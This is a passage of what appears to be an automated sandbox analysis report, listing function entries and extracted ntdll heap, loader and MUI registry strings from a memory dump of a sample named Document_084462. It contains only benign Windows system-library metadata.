                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!$@$@$@$@$@$Control Panel\Desktop$InstallLanguageFallback$LanguageConfiguration$LanguageConfigurationPending$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                              • API String ID: 0-1325123933

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                              • API String ID: 3446177414-1700792311
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                              • API String ID: 3446177414-1745908468
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                              • API String ID: 0-3532704233
                                                                              APIs
                                                                              • RtlDebugPrintTimes.NTDLL ref: 37ADD879
                                                                                • Part of subcall function 37AB4779: RtlDebugPrintTimes.NTDLL ref: 37AB4817
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 3446177414-1975516107
                                                                              Strings
                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 37AAD263
                                                                              • @, xrefs: 37AAD09D
                                                                              • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 37AAD06F
                                                                              • @, xrefs: 37AAD2B3
                                                                              • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 37AAD0E6
                                                                              • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 37AAD202
                                                                              • @, xrefs: 37AAD24F
                                                                              • Control Panel\Desktop\LanguageConfiguration, xrefs: 37AAD136
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                              • API String ID: 0-1356375266
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                                              • API String ID: 0-2224505338
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                              • API String ID: 0-523794902
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                              • API String ID: 0-122214566
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                              • API String ID: 0-4253913091
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                              • API String ID: 3446177414-2283098728
                                                                              Strings
                                                                              • Kernel-MUI-Language-Disallowed, xrefs: 37AD5272
                                                                              • WindowsExcludedProcs, xrefs: 37AD514A
                                                                              • Kernel-MUI-Number-Allowed, xrefs: 37AD5167
                                                                              • Kernel-MUI-Language-Allowed, xrefs: 37AD519B
                                                                              • Kernel-MUI-Language-SKU, xrefs: 37AD534B
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                              • API String ID: 0-258546922
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID:
                                                                              • API String ID: 3446177414-0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                              • API String ID: 0-3061284088
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                              • API String ID: 0-2586055223
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                              • API String ID: 2994545307-1391187441
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: .txt$.txt2$BoG_ *90.0&!! Yy>$stxt371
                                                                              • API String ID: 0-1880532218
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID:
                                                                              • API String ID: 3446177414-0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                              • API String ID: 0-3178619729
                                                                              Strings
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                              • API String ID: 0-1168191160
                                                                              Strings
                                                                              • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 37AB1648
                                                                              • HEAP: , xrefs: 37AB14B6
                                                                              • HEAP[%wZ]: , xrefs: 37AB1632
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                              • API String ID: 0-3178619729
                                                                              Strings
                                                                              • RTL: Re-Waiting, xrefs: 37B20128
                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 37B200C7
                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 37B200F1
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                              • API String ID: 0-2474120054
                                                                              Strings
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                              • API String ID: 0-1145731471
                                                                              Strings
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                              • API String ID: 0-2391371766
                                                                              Strings
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$@$\Registry\Machine\System\CurrentControlSet\Control\MUI\UILanguages
                                                                              • API String ID: 0-1146358195
                                                                              Strings
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                              • API String ID: 0-318774311
                                                                              Strings
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                                                              • API String ID: 0-3870751728
                                                                              Strings
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                              • API String ID: 0-373624363
                                                                              Strings
                                                                              • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 37B8B3AA
                                                                              • GlobalizationUserSettings, xrefs: 37B8B3B4
                                                                              • TargetNtPath, xrefs: 37B8B3AF
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                              • API String ID: 0-505981995
                                                                              Strings
                                                                              • HEAP: , xrefs: 37B0E442
                                                                              • HEAP[%wZ]: , xrefs: 37B0E435
                                                                              • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 37B0E455
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                              • API String ID: 0-1340214556
                                                                              Strings
                                                                              • minkernel\ntdll\ldrmap.c, xrefs: 37B1A3A7
                                                                              • LdrpCompleteMapModule, xrefs: 37B1A39D
                                                                              • Could not validate the crypto signature for DLL %wZ, xrefs: 37B1A396
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                              • API String ID: 0-1676968949
                                                                              Strings
                                                                              • Heap block at %p modified at %p past requested size of %Ix, xrefs: 37B5D7B2
                                                                              • HEAP: , xrefs: 37B5D79F
                                                                              • HEAP[%wZ]: , xrefs: 37B5D792
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                              • API String ID: 0-3815128232
                                                                              Strings
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                              • API String ID: 0-1151232445
                                                                              Strings
                                                                              • minkernel\ntdll\ldrtls.c, xrefs: 37B21954
                                                                              • LdrpAllocateTls, xrefs: 37B2194A
                                                                              • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 37B21943
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                              • API String ID: 0-4274184382
                                                                              Strings
                                                                              • RtlCreateActivationContext, xrefs: 37B22803
                                                                              • SXS: %s() passed the empty activation context data, xrefs: 37B22808
                                                                              • Actx , xrefs: 37AE32CC
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                              • API String ID: 0-859632880
                                                                              Strings
                                                                              • @, xrefs: 37B3B2F0
                                                                              • GlobalFlag, xrefs: 37B3B30F
                                                                              • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 37B3B2B2
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                              • API String ID: 0-4192008846
                                                                              Strings
                                                                              • minkernel\ntdll\ldrtls.c, xrefs: 37B2185B
                                                                              • LdrpInitializeTls, xrefs: 37B21851
                                                                              • DLL "%wZ" has TLS information at %p, xrefs: 37B2184A
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                              • API String ID: 0-931879808
                                                                              Strings
                                                                              • BuildLabEx, xrefs: 37AF122F
                                                                              • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 37AF119B
                                                                              • @, xrefs: 37AF11C5
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                              • API String ID: 0-3051831665
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: RtlValidateHeap
                                                                              • API String ID: 3446177414-1797218451
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$@
                                                                              • API String ID: 0-149943524
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID:
                                                                              • API String ID: 3446177414-0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID:
                                                                              • API String ID: 3446177414-0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: `$`
                                                                              • API String ID: 0-197956300
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$AddD
                                                                              • API String ID: 0-2525844869
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$MUI
                                                                              • API String ID: 0-17815947
                                                                              Strings
                                                                              • RedirectedKey, xrefs: 37B8B60E
                                                                              • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 37B8B5C4
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                                              • API String ID: 0-1388552009
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmp
